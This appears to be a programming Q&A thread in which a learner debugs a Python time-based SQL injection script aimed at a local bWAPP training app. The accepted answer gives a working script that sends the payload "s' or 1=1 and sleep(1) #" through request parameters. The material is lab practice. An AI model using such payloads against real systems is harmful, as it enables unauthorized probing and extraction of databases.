# sql time_based injection script

Tags: python, sql-injection

###### Problem

I was learning about sql injection and
I got a problem with **time_based sql injection script**(use python)

###### error

[page of the bWAPP](https://i.stack.imgur.com/NYgdY.png)

- the Timing is 10sec
- but in the python, things went wrong
- (here are the codes)

```py
import requests
import time
 
st=time.time()
print(st)
res=requests.get("http://localhost:9999/sqli_15.php?title=s'+or+1=1+and+sleep(1)+#+&action=search",{"Cookie":"security_level=0; PHPSESSID=4sg0nucv70bhulmtrs0du0avk2"})
print(res.raise_for_status)
if time.time() - st > 1:
    print(1)
else:
    print(0)
print(time.time())
```

- and the result

```
1666677336.2546937
<bound method Response.raise_for_status of <Response [200]>>
0
1666677336.270689
```

- I got no **sleep time** here
- I tried to change to sql sentences but still failed
- need your help

Comment: Do you know if you've characterized the SQL injection correctly?  If you send sleep(10) from a browser does it wait 10 seconds before responding?  You say 10 seconds above, but note that sleep(1) will be for 1 second.

Comment: @Egret I think that's because there are 10 results for the first select and each one slept 1sec. I had changed it to sleep(2) and got a Timing of 20secs

Comment: The injection is in the where clause (based on the syntax) so that doesn't make a lot of sense to me - but it may be that it's processed multiple times as part of the SQL evaluation - depends on where it is in the statement.

Answer (score 0, accepted):

Hey I solved the question by using the sql_injection sentence **s' or ... sleep(1) #** as a param of the requests.get.

```py
import requests
import time

st=time.time()
print(st)
param={"title":"s' or 1=1 and sleep(1) # ","action":"search"}
res=requests.get("http://localhost:9999/sqli_15.php?",
                headers={"Cookie":"security_level=0; PHPSESSID=7k9m9qojmkdqv0cjt390krkk75"},params=param)

print(res.raise_for_status)
if time.time() - st > 1:
    print(1)
else:
    print(0)
print(time.time())
```

Comment: Glad you solved it - seems like it was likely an encoding issue resolved by using the params.